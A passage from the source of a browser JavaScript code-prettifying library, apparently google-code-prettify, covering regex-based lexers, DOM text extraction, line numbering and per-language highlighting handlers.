          capturedGroups[i] = ++capturedGroupIndex;
        }
      }
      for (var i = 0, groupIndex = 0; i < n; ++i) {
        var p = parts[i];
        if (p === '(') {
          ++groupIndex;
          if (!capturedGroups[groupIndex]) {
            parts[i] = '(?:';
          }
        } else if ('\\' === p.charAt(0)) {
          var decimalValue = +p.substring(1);
          if (decimalValue && decimalValue <= groupIndex) {
            parts[i] = '\\' + capturedGroups[decimalValue];
          }
        }
      }
  
      // Remove any prefix anchors so that the output will match anywhere.
      // ^^ really does mean an anchored match though.
      for (var i = 0; i < n; ++i) {
        if ('^' === parts[i] && '^' !== parts[i + 1]) { parts[i] = ''; }
      }
  
      // Expand letters to groups to handle mixing of case-sensitive and
      // case-insensitive patterns if necessary.
      if (regex.ignoreCase && needToFoldCase) {
        for (var i = 0; i < n; ++i) {
          var p = parts[i];
          var ch0 = p.charAt(0);
          if (p.length >= 2 && ch0 === '[') {
            parts[i] = caseFoldCharset(p);
          } else if (ch0 !== '\\') {
            // TODO: handle letters in numeric escapes.
            parts[i] = p.replace(
                /[a-zA-Z]/g,
                function (ch) {
                  var cc = ch.charCodeAt(0);
                  return '[' + String.fromCharCode(cc & ~32, cc | 32) + ']';
                });
          }
        }
      }
  
      return parts.join('');
    }
  
    var rewritten = [];
    for (var i = 0, n = regexs.length; i < n; ++i) {
      var regex = regexs[i];
      if (regex.global || regex.multiline) { throw new Error('' + regex); }
      rewritten.push(
          '(?:' + allowAnywhereFoldCaseAndRenumberGroups(regex) + ')');
    }
  
    return new RegExp(rewritten.join('|'), ignoreCase ? 'gi' : 'g');
  }

  /**
   * Split markup into a string of source code and an array mapping ranges in
   * that string to the text nodes in which they appear.
   *
   * <p>
   * The HTML DOM structure:</p>
   * <pre>
   * (Element   "p"
   *   (Element "b"
   *     (Text  "print "))       ; #1
   *   (Text    "'Hello '")      ; #2
   *   (Element "br")            ; #3
   *   (Text    "  + 'World';")) ; #4
   * </pre>
   * <p>
   * corresponds to the HTML
   * {@code <p><b>print </b>'Hello '<br>  + 'World';</p>}.</p>
   *
   * <p>
   * It will produce the output:</p>
   * <pre>
   * {
   *   sourceCode: "print 'Hello '\n  + 'World';",
   *   //                     1          2
   *   //           012345678901234 5678901234567
   *   spans: [0, #1, 6, #2, 14, #3, 15, #4]
   * }
   * </pre>
   * <p>
   * where #1 is a reference to the {@code "print "} text node above, and so
   * on for the other text nodes.
   * </p>
   *
   * <p>
   * The {@code} spans array is an array of pairs.  Even elements are the start
   * indices of substrings, and odd elements are the text nodes (or BR elements)
   * that contain the text for those substrings.
   * Substrings continue until the next index or the end of the source.
   * </p>
   *
   * @param {Node} node an HTML DOM subtree containing source-code.
   * @param {boolean|number} isPreformatted truthy if white-space in
   *    text nodes should be considered significant.
   * @return {SourceSpansT} source code and the nodes in which they occur.
   */
  function extractSourceSpans(node, isPreformatted) {
    var nocode = /(?:^|\s)nocode(?:\s|$)/;
  
    var chunks = [];
    var length = 0;
    var spans = [];
    var k = 0;
  
    function walk(node) {
      var type = node.nodeType;
      if (type == 1) {  // Element
        if (nocode.test(node.className)) { return; }
        for (var child = node.firstChild; child; child = child.nextSibling) {
          walk(child);
        }
        var nodeName = node.nodeName.toLowerCase();
        if ('br' === nodeName || 'li' === nodeName) {
          chunks[k] = '\n';
          spans[k << 1] = length++;
          spans[(k++ << 1) | 1] = node;
        }
      } else if (type == 3 || type == 4) {  // Text
        var text = node.nodeValue;
        if (text.length) {
          if (!isPreformatted) {
            text = text.replace(/[ \t\r\n]+/g, ' ');
          } else {
            text = text.replace(/\r\n?/g, '\n');  // Normalize newlines.
          }
          // TODO: handle tabs here?
          chunks[k] = text;
          spans[k << 1] = length;
          length += text.length;
          spans[(k++ << 1) | 1] = node;
        }
      }
    }
  
    walk(node);
  
    return {
      sourceCode: chunks.join('').replace(/\n$/, ''),
      spans: spans
    };
  }

  /**
   * Apply the given language handler to sourceCode and add the resulting
   * decorations to out.
   * @param {!Element} sourceNode
   * @param {number} basePos the index of sourceCode within the chunk of source
   *    whose decorations are already present on out.
   * @param {string} sourceCode
   * @param {function(JobT)} langHandler
   * @param {DecorationsT} out
   */
  function appendDecorations(
      sourceNode, basePos, sourceCode, langHandler, out) {
    if (!sourceCode) { return; }
    /** @type {JobT} */
    var job = {
      sourceNode: sourceNode,
      pre: 1,
      langExtension: null,
      numberLines: null,
      sourceCode: sourceCode,
      spans: null,
      basePos: basePos,
      decorations: null
    };
    langHandler(job);
    out.push.apply(out, job.decorations);
  }

  var notWs = /\S/;

  /**
   * Given an element, if it contains only one child element and any text nodes
   * it contains contain only space characters, return the sole child element.
   * Otherwise returns undefined.
   * <p>
   * This is meant to return the CODE element in {@code <pre><code ...>} when
   * there is a single child element that contains all the non-space textual
   * content, but not to return anything where there are multiple child elements
   * as in {@code <pre><code>...</code><code>...</code></pre>} or when there
   * is textual content.
   */
  function childContentWrapper(element) {
    var wrapper = undefined;
    for (var c = element.firstChild; c; c = c.nextSibling) {
      var type = c.nodeType;
      wrapper = (type === 1)  // Element Node
          ? (wrapper ? element : c)
          : (type === 3)  // Text Node
          ? (notWs.test(c.nodeValue) ? element : wrapper)
          : wrapper;
    }
    return wrapper === element ? undefined : wrapper;
  }

  /** Given triples of [style, pattern, context] returns a lexing function,
    * The lexing function interprets the patterns to find token boundaries and
    * returns a decoration list of the form
    * [index_0, style_0, index_1, style_1, ..., index_n, style_n]
    * where index_n is an index into the sourceCode, and style_n is a style
    * constant like PR_PLAIN.  index_n-1 <= index_n, and style_n-1 applies to
    * all characters in sourceCode[index_n-1:index_n].
    *
    * The stylePatterns is a list whose elements have the form
    * [style : string, pattern : RegExp, DEPRECATED, shortcut : string].
    *
    * Style is a style constant like PR_PLAIN, or can be a string of the
    * form 'lang-FOO', where FOO is a language extension describing the
    * language of the portion of the token in $1 after pattern executes.
    * E.g., if style is 'lang-lisp', and group 1 contains the text
    * '(hello (world))', then that portion of the token will be passed to the
    * registered lisp handler for formatting.
    * The text before and after group 1 will be restyled using this decorator
    * so decorators should take care that this doesn't result in infinite
    * recursion.  For example, the HTML lexer rule for SCRIPT elements looks
    * something like ['lang-js', /<[s]cript>(.+?)<\/script>/].  This may match
    * '<script>foo()<\/script>', which would cause the current decorator to
    * be called with '<script>' which would not match the same rule since
    * group 1 must not be empty, so it would be instead styled as PR_TAG by
    * the generic tag rule.  The handler registered for the 'js' extension would
    * then be called with 'foo()', and finally, the current decorator would
    * be called with '<\/script>' which would not match the original rule and
    * so the generic tag rule would identify it as a tag.
    *
    * Pattern must only match prefixes, and if it matches a prefix, then that
    * match is considered a token with the same style.
    *
    * Context is applied to the last non-whitespace, non-comment token
    * recognized.
    *
    * Shortcut is an optional string of characters, any of which, if the first
    * character, gurantee that this pattern and only this pattern matches.
    *
    * @param {Array} shortcutStylePatterns patterns that always start with
    *   a known character.  Must have a shortcut string.
    * @param {Array} fallthroughStylePatterns patterns that will be tried in
    *   order if the shortcut ones fail.  May have shortcuts.
    *
    * @return {function (JobT)} a function that takes an undecorated job and
    *   attaches a list of decorations.
    */
  function createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns) {
    var shortcuts = {};
    var tokenizer;
    (function () {
      var allPatterns = shortcutStylePatterns.concat(fallthroughStylePatterns);
      var allRegexs = [];
      var regexKeys = {};
      for (var i = 0, n = allPatterns.length; i < n; ++i) {
        var patternParts = allPatterns[i];
        var shortcutChars = patternParts[3];
        if (shortcutChars) {
          for (var c = shortcutChars.length; --c >= 0;) {
            shortcuts[shortcutChars.charAt(c)] = patternParts;
          }
        }
        var regex = patternParts[1];
        var k = '' + regex;
        if (!regexKeys.hasOwnProperty(k)) {
          allRegexs.push(regex);
          regexKeys[k] = null;
        }
      }
      allRegexs.push(/[\0-\uffff]/);
      tokenizer = combinePrefixPatterns(allRegexs);
    })();

    var nPatterns = fallthroughStylePatterns.length;

    /**
     * Lexes job.sourceCode and attaches an output array job.decorations of
     * style classes preceded by the position at which they start in
     * job.sourceCode in order.
     *
     * @type{function (JobT)}
     */
    var decorate = function (job) {
      var sourceCode = job.sourceCode, basePos = job.basePos;
      var sourceNode = job.sourceNode;
      /** Even entries are positions in source in ascending order.  Odd enties
        * are style markers (e.g., PR_COMMENT) that run from that position until
        * the end.
        * @type {DecorationsT}
        */
      var decorations = [basePos, PR_PLAIN];
      var pos = 0;  // index into sourceCode
      var tokens = sourceCode.match(tokenizer) || [];
      var styleCache = {};

      for (var ti = 0, nTokens = tokens.length; ti < nTokens; ++ti) {
        var token = tokens[ti];
        var style = styleCache[token];
        var match = void 0;

        var isEmbedded;
        if (typeof style === 'string') {
          isEmbedded = false;
        } else {
          var patternParts = shortcuts[token.charAt(0)];
          if (patternParts) {
            match = token.match(patternParts[1]);
            style = patternParts[0];
          } else {
            for (var i = 0; i < nPatterns; ++i) {
              patternParts = fallthroughStylePatterns[i];
              match = token.match(patternParts[1]);
              if (match) {
                style = patternParts[0];
                break;
              }
            }

            if (!match) {  // make sure that we make progress
              style = PR_PLAIN;
            }
          }

          isEmbedded = style.length >= 5 && 'lang-' === style.substring(0, 5);
          if (isEmbedded && !(match && typeof match[1] === 'string')) {
            isEmbedded = false;
            style = PR_SOURCE;
          }

          if (!isEmbedded) { styleCache[token] = style; }
        }

        var tokenStart = pos;
        pos += token.length;

        if (!isEmbedded) {
          decorations.push(basePos + tokenStart, style);
        } else {  // Treat group 1 as an embedded block of source code.
          var embeddedSource = match[1];
          var embeddedSourceStart = token.indexOf(embeddedSource);
          var embeddedSourceEnd = embeddedSourceStart + embeddedSource.length;
          if (match[2]) {
            // If embeddedSource can be blank, then it would match at the
            // beginning which would cause us to infinitely recurse on the
            // entire token, so we catch the right context in match[2].
            embeddedSourceEnd = token.length - match[2].length;
            embeddedSourceStart = embeddedSourceEnd - embeddedSource.length;
          }
          var lang = style.substring(5);
          // Decorate the left of the embedded source
          appendDecorations(
              sourceNode,
              basePos + tokenStart,
              token.substring(0, embeddedSourceStart),
              decorate, decorations);
          // Decorate the embedded source
          appendDecorations(
              sourceNode,
              basePos + tokenStart + embeddedSourceStart,
              embeddedSource,
              langHandlerForExtension(lang, embeddedSource),
              decorations);
          // Decorate the right of the embedded section
          appendDecorations(
              sourceNode,
              basePos + tokenStart + embeddedSourceEnd,
              token.substring(embeddedSourceEnd),
              decorate, decorations);
        }
      }
      job.decorations = decorations;
    };
    return decorate;
  }

  /** returns a function that produces a list of decorations from source text.
    *
    * This code treats ", ', and ` as string delimiters, and \ as a string
    * escape.  It does not recognize perl's qq() style strings.
    * It has no special handling for double delimiter escapes as in basic, or
    * the tripled delimiters used in python, but should work on those regardless
    * although in those cases a single string literal may be broken up into
    * multiple adjacent string literals.
    *
    * It recognizes C, C++, and shell style comments.
    *
    * @param {Object} options a set of optional parameters.
    * @return {function (JobT)} a function that examines the source code
    *     in the input job and builds a decoration list which it attaches to
    *     the job.
    */
  function sourceDecorator(options) {
    var shortcutStylePatterns = [], fallthroughStylePatterns = [];
    if (options['tripleQuotedStrings']) {
      // '''multi-line-string''', 'single-line-string', and double-quoted
      shortcutStylePatterns.push(
          [PR_STRING,  /^(?:\'\'\'(?:[^\'\\]|\\[\s\S]|\'{1,2}(?=[^\']))*(?:\'\'\'|$)|\"\"\"(?:[^\"\\]|\\[\s\S]|\"{1,2}(?=[^\"]))*(?:\"\"\"|$)|\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$))/,
           null, '\'"']);
    } else if (options['multiLineStrings']) {
      // 'multi-line-string', "multi-line-string"
      shortcutStylePatterns.push(
          [PR_STRING,  /^(?:\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$)|\`(?:[^\\\`]|\\[\s\S])*(?:\`|$))/,
           null, '\'"`']);
    } else {
      // 'single-line-string', "single-line-string"
      shortcutStylePatterns.push(
          [PR_STRING,
           /^(?:\'(?:[^\\\'\r\n]|\\.)*(?:\'|$)|\"(?:[^\\\"\r\n]|\\.)*(?:\"|$))/,
           null, '"\'']);
    }
    if (options['verbatimStrings']) {
      // verbatim-string-literal production from the C# grammar.  See issue 93.
      fallthroughStylePatterns.push(
          [PR_STRING, /^@\"(?:[^\"]|\"\")*(?:\"|$)/, null]);
    }
    var hc = options['hashComments'];
    if (hc) {
      if (options['cStyleComments']) {
        if (hc > 1) {  // multiline hash comments
          shortcutStylePatterns.push(
              [PR_COMMENT, /^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/, null, '#']);
        } else {
          // Stop C preprocessor declarations at an unclosed open comment
          shortcutStylePatterns.push(
              [PR_COMMENT, /^#(?:(?:define|e(?:l|nd)if|else|error|ifn?def|include|line|pragma|undef|warning)\b|[^\r\n]*)/,
               null, '#']);
        }
        // #include <stdio.h>
        fallthroughStylePatterns.push(
            [PR_STRING,
             /^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h(?:h|pp|\+\+)?|[a-z]\w*)>/,
             null]);
      } else {
        shortcutStylePatterns.push([PR_COMMENT, /^#[^\r\n]*/, null, '#']);
      }
    }
    if (options['cStyleComments']) {
      fallthroughStylePatterns.push([PR_COMMENT, /^\/\/[^\r\n]*/, null]);
      fallthroughStylePatterns.push(
          [PR_COMMENT, /^\/\*[\s\S]*?(?:\*\/|$)/, null]);
    }
    var regexLiterals = options['regexLiterals'];
    if (regexLiterals) {
      /**
       * @const
       */
      var regexExcls = regexLiterals > 1
        ? ''  // Multiline regex literals
        : '\n\r';
      /**
       * @const
       */
      var regexAny = regexExcls ? '.' : '[\\S\\s]';
      /**
       * @const
       */
      var REGEX_LITERAL = (
          // A regular expression literal starts with a slash that is
          // not followed by * or / so that it is not confused with
          // comments.
          '/(?=[^/*' + regexExcls + '])'
          // and then contains any number of raw characters,
          + '(?:[^/\\x5B\\x5C' + regexExcls + ']'
          // escape sequences (\x5C),
          +    '|\\x5C' + regexAny
          // or non-nesting character sets (\x5B\x5D);
          +    '|\\x5B(?:[^\\x5C\\x5D' + regexExcls + ']'
          +             '|\\x5C' + regexAny + ')*(?:\\x5D|$))+'
          // finally closed by a /.
          + '/');
      fallthroughStylePatterns.push(
          ['lang-regex',
           RegExp('^' + REGEXP_PRECEDER_PATTERN + '(' + REGEX_LITERAL + ')')
           ]);
    }

    var types = options['types'];
    if (types) {
      fallthroughStylePatterns.push([PR_TYPE, types]);
    }

    var keywords = ("" + options['keywords']).replace(/^ | $/g, '');
    if (keywords.length) {
      fallthroughStylePatterns.push(
          [PR_KEYWORD,
           new RegExp('^(?:' + keywords.replace(/[\s,]+/g, '|') + ')\\b'),
           null]);
    }

    shortcutStylePatterns.push([PR_PLAIN,       /^\s+/, null, ' \r\n\t\xA0']);

    var punctuation =
      // The Bash man page says

      // A word is a sequence of characters considered as a single
      // unit by GRUB. Words are separated by metacharacters,
      // which are the following plus space, tab, and newline: { }
      // | & $ ; < >
      // ...

      // A word beginning with # causes that word and all remaining
      // characters on that line to be ignored.

      // which means that only a '#' after /(?:^|[{}|&$;<>\s])/ starts a
      // comment but empirically
      // $ echo {#}
      // {#}
      // $ echo \$#
      // $#
      // $ echo }#
      // }#

      // so /(?:^|[|&;<>\s])/ is more appropriate.

      // http://gcc.gnu.org/onlinedocs/gcc-2.95.3/cpp_1.html#SEC3
      // suggests that this definition is compatible with a
      // default mode that tries to use a single token definition
      // to recognize both bash/python style comments and C
      // preprocessor directives.

      // This definition of punctuation does not include # in the list of
      // follow-on exclusions, so # will not be broken before if preceeded
      // by a punctuation character.  We could try to exclude # after
      // [|&;<>] but that doesn't seem to cause many major problems.
      // If that does turn out to be a problem, we should change the below
      // when hc is truthy to include # in the run of punctuation characters
      // only when not followint [|&;<>].
      '^.[^\\s\\w.$@\'"`/\\\\]*';
    if (options['regexLiterals']) {
      punctuation += '(?!\s*\/)';
    }

    fallthroughStylePatterns.push(
        // TODO(mikesamuel): recognize non-latin letters and numerals in idents
        [PR_LITERAL,     /^@[a-z_$][a-z_$@0-9]*/i, null],
        [PR_TYPE,        /^(?:[@_]?[A-Z]+[a-z][A-Za-z_$@0-9]*|\w+_t\b)/, null],
        [PR_PLAIN,       /^[a-z_$][a-z_$@0-9]*/i, null],
        [PR_LITERAL,
         new RegExp(
             '^(?:'
             // A hex number
             + '0x[a-f0-9]+'
             // or an octal or decimal number,
             + '|(?:\\d(?:_\\d+)*\\d*(?:\\.\\d*)?|\\.\\d\\+)'
             // possibly in scientific notation
             + '(?:e[+\\-]?\\d+)?'
             + ')'
             // with an optional modifier like UL for unsigned long
             + '[a-z]*', 'i'),
         null, '0123456789'],
        // Don't treat escaped quotes in bash as starting strings.
        // See issue 144.
        [PR_PLAIN,       /^\\[\s\S]?/, null],
        [PR_PUNCTUATION, new RegExp(punctuation), null]);

    return createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns);
  }

  var decorateSource = sourceDecorator({
        'keywords': ALL_KEYWORDS,
        'hashComments': true,
        'cStyleComments': true,
        'multiLineStrings': true,
        'regexLiterals': true
      });

  /**
   * Given a DOM subtree, wraps it in a list, and puts each line into its own
   * list item.
   *
   * @param {Node} node modified in place.  Its content is pulled into an
   *     HTMLOListElement, and each line is moved into a separate list item.
   *     This requires cloning elements, so the input might not have unique
   *     IDs after numbering.
   * @param {number|null|boolean} startLineNum
   *     If truthy, coerced to an integer which is the 1-indexed line number
   *     of the first line of code.  The number of the first line will be
   *     attached to the list.
   * @param {boolean} isPreformatted true iff white-space in text nodes should
   *     be treated as significant.
   */
  function numberLines(node, startLineNum, isPreformatted) {
    var nocode = /(?:^|\s)nocode(?:\s|$)/;
    var lineBreak = /\r\n?|\n/;
  
    var document = node.ownerDocument;
  
    var li = document.createElement('li');
    while (node.firstChild) {
      li.appendChild(node.firstChild);
    }
    // An array of lines.  We split below, so this is initialized to one
    // un-split line.
    var listItems = [li];
  
    function walk(node) {
      var type = node.nodeType;
      if (type == 1 && !nocode.test(node.className)) {  // Element
        if ('br' === node.nodeName) {
          breakAfter(node);
          // Discard the <BR> since it is now flush against a </LI>.
          if (node.parentNode) {
            node.parentNode.removeChild(node);
          }
        } else {
          for (var child = node.firstChild; child; child = child.nextSibling) {
            walk(child);
          }
        }
      } else if ((type == 3 || type == 4) && isPreformatted) {  // Text
        var text = node.nodeValue;
        var match = text.match(lineBreak);
        if (match) {
          var firstLine = text.substring(0, match.index);
          node.nodeValue = firstLine;
          var tail = text.substring(match.index + match[0].length);
          if (tail) {
            var parent = node.parentNode;
            parent.insertBefore(
              document.createTextNode(tail), node.nextSibling);
          }
          breakAfter(node);
          if (!firstLine) {
            // Don't leave blank text nodes in the DOM.
            node.parentNode.removeChild(node);
          }
        }
      }
    }
  
    // Split a line after the given node.
    function breakAfter(lineEndNode) {
      // If there's nothing to the right, then we can skip ending the line
      // here, and move root-wards since splitting just before an end-tag
      // would require us to create a bunch of empty copies.
      while (!lineEndNode.nextSibling) {
        lineEndNode = lineEndNode.parentNode;
        if (!lineEndNode) { return; }
      }
  
      function breakLeftOf(limit, copy) {
        // Clone shallowly if this node needs to be on both sides of the break.
        var rightSide = copy ? limit.cloneNode(false) : limit;
        var parent = limit.parentNode;
        if (parent) {
          // We clone the parent chain.
          // This helps us resurrect important styling elements that cross lines.
          // E.g. in <i>Foo<br>Bar</i>
          // should be rewritten to <li><i>Foo</i></li><li><i>Bar</i></li>.
          var parentClone = breakLeftOf(parent, 1);
          // Move the clone and everything to the right of the original
          // onto the cloned parent.
          var next = limit.nextSibling;
          parentClone.appendChild(rightSide);
          for (var sibling = next; sibling; sibling = next) {
            next = sibling.nextSibling;
            parentClone.appendChild(sibling);
          }
        }
        return rightSide;
      }
  
      var copiedListItem = breakLeftOf(lineEndNode.nextSibling, 0);
  
      // Walk the parent chain until we reach an unattached LI.
      for (var parent;
           // Check nodeType since IE invents document fragments.
           (parent = copiedListItem.parentNode) && parent.nodeType === 1;) {
        copiedListItem = parent;
      }
      // Put it on the list of lines for later processing.
      listItems.push(copiedListItem);
    }
  
    // Split lines while there are lines left to split.
    for (var i = 0;  // Number of lines that have been split so far.
         i < listItems.length;  // length updated by breakAfter calls.
         ++i) {
      walk(listItems[i]);
    }
  
    // Make sure numeric indices show correctly.
    if (startLineNum === (startLineNum|0)) {
      listItems[0].setAttribute('value', startLineNum);
    }
  
    var ol = document.createElement('ol');
    ol.className = 'linenums';
    var offset = Math.max(0, ((startLineNum - 1 /* zero index */)) | 0) || 0;
    for (var i = 0, n = listItems.length; i < n; ++i) {
      li = listItems[i];
      // Stick a class on the LIs so that stylesheets can
      // color odd/even rows, or any other row pattern that
      // is co-prime with 10.
      li.className = 'L' + ((i + offset) % 10);
      if (!li.firstChild) {
        li.appendChild(document.createTextNode('\xA0'));
      }
      ol.appendChild(li);
    }
  
    node.appendChild(ol);
  }

  /**
   * Breaks {@code job.sourceCode} around style boundaries in
   * {@code job.decorations} and modifies {@code job.sourceNode} in place.
   * @param {JobT} job
   * @private
   */
  function recombineTagsAndDecorations(job) {
    var isIE8OrEarlier = /\bMSIE\s(\d+)/.exec(navigator.userAgent);
    isIE8OrEarlier = isIE8OrEarlier && +isIE8OrEarlier[1] <= 8;
    var newlineRe = /\n/g;
  
    var source = job.sourceCode;
    var sourceLength = source.length;
    // Index into source after the last code-unit recombined.
    var sourceIndex = 0;
  
    var spans = job.spans;
    var nSpans = spans.length;
    // Index into spans after the last span which ends at or before sourceIndex.
    var spanIndex = 0;
  
    var decorations = job.decorations;
    var nDecorations = decorations.length;
    // Index into decorations after the last decoration which ends at or before
    // sourceIndex.
    var decorationIndex = 0;
  
    // Remove all zero-length decorations.
    decorations[nDecorations] = sourceLength;
    var decPos, i;
    for (i = decPos = 0; i < nDecorations;) {
      if (decorations[i] !== decorations[i + 2]) {
        decorations[decPos++] = decorations[i++];
        decorations[decPos++] = decorations[i++];
      } else {
        i += 2;
      }
    }
    nDecorations = decPos;
  
    // Simplify decorations.
    for (i = decPos = 0; i < nDecorations;) {
      var startPos = decorations[i];
      // Conflate all adjacent decorations that use the same style.
      var startDec = decorations[i + 1];
      var end = i + 2;
      while (end + 2 <= nDecorations && decorations[end + 1] === startDec) {
        end += 2;
      }
      decorations[decPos++] = startPos;
      decorations[decPos++] = startDec;
      i = end;
    }
  
    nDecorations = decorations.length = decPos;
  
    var sourceNode = job.sourceNode;
    var oldDisplay = "";
    if (sourceNode) {
      oldDisplay = sourceNode.style.display;
      sourceNode.style.display = 'none';
    }
    try {
      var decoration = null;
      while (spanIndex < nSpans) {
        var spanStart = spans[spanIndex];
        var spanEnd = /** @type{number} */ (spans[spanIndex + 2])
            || sourceLength;
  
        var decEnd = decorations[decorationIndex + 2] || sourceLength;
  
        var end = Math.min(spanEnd, decEnd);
  
        var textNode = /** @type{Node} */ (spans[spanIndex + 1]);
        var styledText;
        if (textNode.nodeType !== 1  // Don't muck with <BR>s or <LI>s
            // Don't introduce spans around empty text nodes.
            && (styledText = source.substring(sourceIndex, end))) {
          // This may seem bizarre, and it is.  Emitting LF on IE causes the
          // code to display with spaces instead of line breaks.
          // Emitting Windows standard issue linebreaks (CRLF) causes a blank
          // space to appear at the beginning of every line but the first.
          // Emitting an old Mac OS 9 line separator makes everything spiffy.
          if (isIE8OrEarlier) {
            styledText = styledText.replace(newlineRe, '\r');
          }
          textNode.nodeValue = styledText;
          var document = textNode.ownerDocument;
          var span = document.createElement('span');
          span.className = decorations[decorationIndex + 1];
          var parentNode = textNode.parentNode;
          parentNode.replaceChild(span, textNode);
          span.appendChild(textNode);
          if (sourceIndex < spanEnd) {  // Split off a text node.
            spans[spanIndex + 1] = textNode
                // TODO: Possibly optimize by using '' if there's no flicker.
                = document.createTextNode(source.substring(end, spanEnd));
            parentNode.insertBefore(textNode, span.nextSibling);
          }
        }
  
        sourceIndex = end;
  
        if (sourceIndex >= spanEnd) {
          spanIndex += 2;
        }
        if (sourceIndex >= decEnd) {
          decorationIndex += 2;
        }
      }
    } finally {
      if (sourceNode) {
        sourceNode.style.display = oldDisplay;
      }
    }
  }

  /** Maps language-specific file extensions to handlers. */
  var langHandlerRegistry = {};
  /** Register a language handler for the given file extensions.
    * @param {function (JobT)} handler a function from source code to a list
    *      of decorations.  Takes a single argument job which describes the
    *      state of the computation and attaches the decorations to it.
    * @param {Array.<string>} fileExtensions
    */
  function registerLangHandler(handler, fileExtensions) {
    for (var i = fileExtensions.length; --i >= 0;) {
      var ext = fileExtensions[i];
      if (!langHandlerRegistry.hasOwnProperty(ext)) {
        langHandlerRegistry[ext] = handler;
      } else if (win['console']) {
        console['warn']('cannot override language handler %s', ext);
      }
    }
  }
  function langHandlerForExtension(extension, source) {
    if (!(extension && langHandlerRegistry.hasOwnProperty(extension))) {
      // Treat it as markup if the first non whitespace character is a < and
      // the last non-whitespace character is a >.
      extension = /^\s*</.test(source)
          ? 'default-markup'
          : 'default-code';
    }
    return langHandlerRegistry[extension];
  }
  registerLangHandler(decorateSource, ['default-code']);
  registerLangHandler(
      createSimpleLexer(
          [],
          [
           [PR_PLAIN,       /^[^<?]+/],
           [PR_DECLARATION, /^<!\w[^>]*(?:>|$)/],
           [PR_COMMENT,     /^<\!--[\s\S]*?(?:-\->|$)/],
           // Unescaped content in an unknown language
           ['lang-',        /^<\?([\s\S]+?)(?:\?>|$)/],
           ['lang-',        /^<%([\s\S]+?)(?:%>|$)/],
           [PR_PUNCTUATION, /^(?:<[%?]|[%?]>)/],
           ['lang-',        /^<xmp\b[^>]*>([\s\S]+?)<\/xmp\b[^>]*>/i],
           // Unescaped content in javascript.  (Or possibly vbscript).
           ['lang-js',      /^<script\b[^>]*>([\s\S]*?)(<\/script\b[^>]*>)/i],
           // Contains unescaped stylesheet content
           ['lang-css',     /^<style\b[^>]*>([\s\S]*?)(<\/style\b[^>]*>)/i],
           ['lang-in.tag',  /^(<\/?[a-z][^<>]*>)/i]
          ]),
      ['default-markup', 'htm', 'html', 'mxml', 'xhtml', 'xml', 'xsl']);
  registerLangHandler(
      createSimpleLexer(
          [
           [PR_PLAIN,        /^[\s]+/, null, ' \t\r\n'],
           [PR_ATTRIB_VALUE, /^(?:\"[^\"]*\"?|\'[^\']*\'?)/, null, '\"\'']
           ],
          [
           [PR_TAG,          /^^<\/?[a-z](?:[\w.:-]*\w)?|\/?>$/i],
           [PR_ATTRIB_NAME,  /^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i],
           ['lang-uq.val',   /^=\s*([^>\'\"\s]*(?:[^>\'\"\s\/]|\/(?=\s)))/],
           [PR_PUNCTUATION,  /^[=<>\/]+/],
           ['lang-js',       /^on\w+\s*=\s*\"([^\"]+)\"/i],
           ['lang-js',       /^on\w+\s*=\s*\'([^\']+)\'/i],
           ['lang-js',       /^on\w+\s*=\s*([^\"\'>\s]+)/i],
           ['lang-css',      /^style\s*=\s*\"([^\"]+)\"/i],
           ['lang-css',      /^style\s*=\s*\'([^\']+)\'/i],
           ['lang-css',      /^style\s*=\s*([^\"\'>\s]+)/i]
           ]),
      ['in.tag']);
  registerLangHandler(
      createSimpleLexer([], [[PR_ATTRIB_VALUE, /^[\s\S]+/]]), ['uq.val']);
  registerLangHandler(sourceDecorator({
          'keywords': CPP_KEYWORDS,
          'hashComments': true,
          'cStyleComments': true,
          'types': C_TYPES
        }), ['c', 'cc', 'cpp', 'cxx', 'cyc', 'm']);
  registerLangHandler(sourceDecorator({
          'keywords': 'null,true,false'
        }), ['json']);
  registerLangHandler(sourceDecorator({
          'keywords': CSHARP_KEYWORDS,
          'hashComments': true,
          'cStyleComments': true,
          'verbatimStrings': true,
          'types': C_TYPES
        }), ['cs']);
  registerLangHandler(sourceDecorator({
          'keywords': JAVA_KEYWORDS,
          'cStyleComments': true
        }), ['java']);
  registerLangHandler(sourceDecorator({
          'keywords': SH_KEYWORDS,
          'hashComments': true,
          'multiLineStrings': true
        }), ['bash', 'bsh', 'csh', 'sh']);
  registerLangHandler(sourceDecorator({
          'keywords': PYTHON_KEYWORDS,
          'hashComments': true,
          'multiLineStrings': true,
          'tripleQuotedStrings': true
        }), ['cv', 'py', 'python']);
  registerLangHandler(sourceDecorator({
          'keywords': PERL_KEYWORDS,
          'hashComments': true,
          'multiLineStrings': true,
          'regexLiterals': 2  // multiline regex literals
        }), ['perl', 'pl', 'pm']);
  registerLangHandler(sourceDecorator({
          'keywords': RUBY_KEYWORDS,
          'hashComments': true,
          'multiLineStrings': true,
          'regexLiterals': true
        }), ['rb', 'ruby']);
  registerLangHandler(sourceDecorator({
          'keywords': JSCRIPT_KEYWORDS,
          'cStyleComments': true,
          'regexLiterals': true
        }), ['javascript', 'js', 'ts', 'typescript']);
  registerLangHandler(sourceDecorator({
          'keywords': COFFEE_KEYWORDS,
          'hashComments': 3,  // ### style block comments
          'cStyleComments': true,
          'multilineStrings': true,
          'tripleQuotedStrings': true,
          'regexLiterals': true
        }), ['coffee']);
  registerLangHandler(
      createSimpleLexer([], [[PR_STRING, /^[\s\S]+/]]), ['regex']);

  /** @param {JobT} job */
  function applyDecorator(job) {
    var opt_langExtension = job.langExtension;

    try {
      // Extract tags, and convert the source code to plain text.
      var sourceAndSpans = extractSourceSpans(job.sourceNode, job.pre);
      /** Plain text. @type {string} */
      var source = sourceAndSpans.sourceCode;
      job.sourceCode = source;
      job.spans = sourceAndSpans.spans;
      job.basePos = 0;

      // Apply the appropriate language handler
      langHandlerForExtension(opt_langExtension, source)(job);

      // Integrate the decorations and tags back into the source code,
      // modifying the sourceNode in place.
      recombineTagsAndDecorations(job);
    } catch (e) {
      if (win['console']) {
        console['log'](e && e['stack'] || e);
      }
    }
  }

  /**
   * Pretty print a chunk of code.
   * @param sourceCodeHtml {string} The HTML to pretty print.
